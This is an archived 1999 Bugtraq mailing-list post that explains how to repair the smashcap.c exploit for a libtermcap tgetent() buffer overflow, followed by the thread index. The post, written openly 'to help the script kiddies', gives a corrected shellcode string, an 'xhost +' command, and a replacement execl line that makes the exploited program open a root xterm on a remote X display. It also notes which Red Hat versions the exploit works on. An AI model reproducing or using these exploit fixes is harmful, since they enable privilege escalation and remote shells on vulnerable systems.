Bugtraq mailing list archives
libtermcap exploit fix ... smashcap.c
From: luci () WILD TRANSART RO (Hudin Lucian)
Date: Mon, 23 Aug 1999 01:18:16 +0300
Hi, since bugtraq it's a full-disclosure list, let's help the script kiddies a bit and scare the sysadms a little bit more... To make the smashcap.c work , all you have to do is remove one 0xff character before /bin/sh in the shellcode so the line would be : "\x80\xe8\xdc\xff\xff\xff/bin/sh" instead of : "\x80\xe8\xdc\xff\xff\xff\xff/bin/sh" also, you'll have to be on console running x to exploit it, but if you have another box where you can start x then it's ok myhost$ startx;xhost +victim.com victim$ ./smashcap and modify the last line from the smashcap.c into execl("/usr/X11R6/bin/xterm","xterm", "-display", "victim.com:0", 0); well, it works on most redhats (tested on 5.1 and 5.2) on slakware it sigsegv's , you need to work a little bit, sorry I don't have a slakware box to work on . regards, lucysoft
Current thread:
- IE 5.0 allows executing programs, (continued)
- IE 5.0 allows executing programs Georgi Guninski (Aug 21)
- Re: IE 5.0 allows executing programs David LeBlanc (Aug 23)
- Re: IE 5.0 allows executing programs Jesper M. Johansson (Aug 28)
- Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 21)
- Re: Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 24)
- Re: Vulnerability in Solaris 2.6. rpc.statd ? mb (Aug 28)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Martin Schulze (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Aaron Campbell (Aug 19)
- Microsoft Security Bulletin (MS99-030) Aleph One (Aug 20)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Alan Cox (Aug 22)
- libtermcap exploit fix ... smashcap.c Hudin Lucian (Aug 22)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Pavel Kankovsky (Aug 26)
- OCE' 9400 plotters Larry W. Cashdollar (Aug 19)
- Re: OCE' 9400 plotters Patrick Cantwell (Aug 23)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Tymm Twillman (Aug 19)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Olaf Kirch (Aug 18)
- Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Martin Schulze (Aug 19)
- Re: Security Bug in Oracle Jonathan A. Zdziarski (Aug 27)
- [RHSA-1999:030-02] Buffer overflow in cron daemon Bill Nottingham (Aug 27)